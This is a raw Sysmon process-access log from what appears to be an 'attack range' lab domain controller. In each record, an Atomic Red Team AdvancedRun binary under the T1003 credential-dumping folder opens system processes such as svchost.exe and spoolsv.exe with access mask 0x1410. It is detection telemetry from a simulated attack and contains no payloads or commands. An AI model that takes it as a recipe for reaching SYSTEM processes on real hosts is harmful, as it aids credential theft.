17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003980118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
